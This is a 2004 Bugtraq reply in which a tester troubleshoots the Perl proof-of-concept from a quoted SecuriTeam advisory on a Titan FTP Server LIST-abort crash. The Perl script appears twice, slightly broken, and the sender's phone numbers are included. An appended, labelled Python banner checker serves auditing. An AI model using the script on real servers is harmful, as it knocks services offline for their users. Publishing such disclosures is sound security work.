Date: Thu, 06 May 2004 19:19:59 -0700
From: Gene Ken <gken@....sina.com>
To: Aviram Jenik <aviram@...ondsecurity.com>
Cc: bugtraq@...urityfocus.com
Subject: Re: Titan FTP Server Aborted LIST DoS


Hi Aviram,

   I have some trouble testing the current exploit. Below is my test
procedure:

1) In my test bed, the host side is WinXP Professional with ip_addr 192.168.0.2
   (English, 5.1 build 2600), and the client side is Red Hat Linux 9 using NAT
   in VMware Workstation 4.5.1 build-7568 with ip_addr 192.168.92.3.

2) I have successfully installed Titan FTP Server v3.01 Build 163 on the WinXP
    Pro platform. Also, the Perl script you mentioned in your article has
    successfully executed, as shown below:

/* On my Red Hat box, I use ftp to verify that the Titan FTP server is running;
    the result is as below: */

[gken@rh9 gken]$ ftp 192.168.0.2
Connected to 192.168.0.2 (192.168.0.2).
220 Titan FTP Server 3.01.163 Ready.
Name (192.168.0.2:gken): gken
331 User name okay, need password.
Password:
230-Welcome gken from 192.168.0.2. You are now logged in to the server.
230 User logged in, proceed.
Remote system type is UNIX.
Using binary mode to transfer files.

/* executing titan.pl script */
[gken@rh9 gken]$ perl titan.pl
Combination:
cannot connect to ftp daemon on 192.168.0.2 at titan.pl line 22.


    How can I tackle this? Thanks in advance!



---the titan.pl---
  #!/usr/bin/perl
  # Test for Titan FTP server security vulnerability
  #
  # Orkut users? Come join the SecuriTeam community
  # http://www.orkut.com/Community.aspx?cmm=44441
  #
  use IO::Socket;

  $host = "192.168.0.2";

  my @combination;
  $combination[0] = "LIST \r\n";

  for (my $i = 0; $combination[$i] ; $i++)
  {
   print "Combination: $1\n";

   $remote = IO::Socket::INET->new ( Proto => "tcp",
       PeerAddr => $host,
       PeerPort => "2112",
       );
   unless ($remote) { die "cannot connect to ftp daemon on $host" }

   print "connected\n";
   while (<$remote>)
   {
    print $_;
    if (/220 /)
    {
     last;
    }
   }

   $remote->autoflush(1);

   my $ftp = "USER anonymous\r\n";

   print $remote $ftp;
   print $ftp;

   while (<$remote>)
   {
    print $_;
    if (/331 /)
    {
     last;
    }
   }

   $ftp = "PASS a\@b.com\r\n";
   print $remote $ftp;
   print $ftp;

   while (<$remote>)
   {
    print $_;
    if (/230 /)
    {
     last;
    }
   }

   $ftp = $combination[$i];

   print $remote $ftp;
   print $ftp;

   while (<$remote>)
   {
    print $_;
    if (/150 /)
    {
     last;
    }


   close $remote;
  }
}

At 05:51 AM 5/5/2004, you wrote:
>  Titan FTP Server Aborted LIST DoS
>----------------------------------------------------
>
>
>Article reference:
>http://www.securiteam.com/windowsntfocus/5RP0215CUU.html
>
>
>SUMMARY
>
>A security vulnerability exists in South River Technologies' Titan FTP Server.
>An attacker issuing a LIST command and disconnecting before the LIST command
>had the time to connect, will cause the program to try and access an invalid
>socket. This will result in the FTP service's crash (and in turn, no longer
>being able to service any additional users).
>
>
>DETAILS
>
>Vulnerable Systems:
>   * Titan FTP Server version 3.01 build 163
>
>  Immune Systems:
>   * Titan FTP Server version 3.10 build 169
>
>  Solution:
>  To solve this issue upgrade to the latest version (3.10 build 169 or newer).
>
>  Exploit:
>  #!/usr/bin/perl
>  # Test for Titan FTP server security vulnerability
>  #
>  # Orkut users? Come join the SecuriTeam community
>  # http://www.orkut.com/Community.aspx?cmm=44441
>  #
>  use IO::Socket;
>
>  $host = "192.168.1.243";
>
>  my @combination;
>  $combination[0] = "LIST \r\n";
>
>  for (my $i = 0; $combination[$i] ; $i++)
>  {
>   print "Combination: $1\n";
>
>   $remote = IO::Socket::INET->new ( Proto => "tcp",
>       PeerAddr => $host,
>       PeerPort => "2112",
>       );
>   unless ($remote) { die "cannot connect to ftp daemon on $host" }
>
>   print "connected\n";
>   while (<$remote>)
>   {
>    print $_;
>    if (/220 /)
>    {
>     last;
>    }
>   }
>
>   $remote->autoflush(1);
>
>   my $ftp = "USER anonymous\r\n";
>
>   print $remote $ftp;
>   print $ftp;
>
>   while (<$remote>)
>   {
>    print $_;
>    if (/331 /)
>    {
>     last;
>    }
>   }
>
>   $ftp = "PASS a\@b.com\r\n";
>   print $remote $ftp;
>   print $ftp;
>
>   while (<$remote>)
>   {
>    print $_;
>    if (/230 /)
>    {
>     last;
>    }
>   }
>
>   $ftp = $combination[$i];
>
>   print $remote $ftp;
>   print $ftp;
>
>   while (<$remote>)
>   {
>    print $_;
>    if (/150 /)
>    {
>     last;
>    }
>
>
>   close $remote;
>  }
>
>
>ADDITIONAL INFORMATION
>
>SecurITeam would like to thank  <mailto:storm@...uriteam.com> STORM for
>finding this vulnerability.
>
>
>
>
>Regards,
>Aviram Jenik
>Beyond Security Ltd.
>
>http://www.BeyondSecurity.com
>http://www.SecuriTeam.com
>
>The First Integrated Network and Web Application Vulnerability Scanner:
>http://www.beyondsecurity.com/webscan-wp.pdf
>
>
>
>
>====================
>====================
>
>DISCLAIMER:
>The information in this bulletin is provided "AS IS" without warranty of any
>kind.
>In no event shall we be liable for any damages whatsoever including direct,
>indirect, incidental, consequential, loss of business profits or special
>damages.

Regards,

Gene Ken
86-10-62928315 (Home)
86-13901016339 (Cell)
/* Out of intense complexities, emerge intense simplicities. */ 
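
An added example, not part of the original message or the advisory: a banner check that classifies an FTP greeting against the two versions the advisory names (3.01 build 163 vulnerable, 3.10 build 169 immune). It assumes the greeting keeps the "220 Titan FTP Server 3.01.163 Ready." shape seen in the session above; the status names and all sample greetings except that one are constructed.

```python
import re

# Versions stated in the advisory, as (major, minor, build).
KNOWN_VULNERABLE = (3, 1, 163)   # "version 3.01 build 163"
FIRST_FIXED = (3, 10, 169)       # "version 3.10 build 169"

# Assumption: the version is printed as major.minor.build, as in the
# greeting shown in the post ("220 Titan FTP Server 3.01.163 Ready.").
BANNER_RE = re.compile(
    r"^220[ -].*?Titan FTP Server (\d+)\.(\d+)\.(\d+)", re.IGNORECASE)


def parse_titan_banner(greeting):
    """Return (major, minor, build) from an FTP greeting, or None."""
    for line in greeting.splitlines():   # multi-line 220- greetings are allowed
        m = BANNER_RE.match(line.strip())
        if m:
            # Integer tuples compare field by field, so a hypothetical 3.9
            # sorts below 3.10; comparing the raw strings would get that wrong.
            return tuple(int(part) for part in m.groups())
    return None


def classify(greeting):
    """Map a greeting to an audit status using the advisory's versions."""
    if "titan ftp server" not in greeting.lower():
        return "not-titan"
    version = parse_titan_banner(greeting)
    if version is None:
        return "titan-version-unknown"   # product named, version hidden
    if version == KNOWN_VULNERABLE:
        return "vulnerable"              # the build the advisory lists
    if version < FIRST_FIXED:
        return "upgrade-recommended"     # older than the fix, not listed
    return "fixed"


# Constructed sample greetings; only the first appears in the post.
SAMPLES = [
    "220 Titan FTP Server 3.01.163 Ready.",
    "220 Titan FTP Server 3.10.169 Ready.",
    "220-Welcome\r\n220 Titan FTP Server 3.02.100 Ready.",
    "220 Titan FTP Server Ready.",
    "220 Some Other FTP Daemon ready.",
]

if __name__ == "__main__":
    for banner in SAMPLES:
        print(f"{classify(banner):22} {banner!r}")
```

A greeting can be changed or hidden by the administrator, so a "fixed" or "not-titan" result is a hint for inventory purposes, not proof of the installed build.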


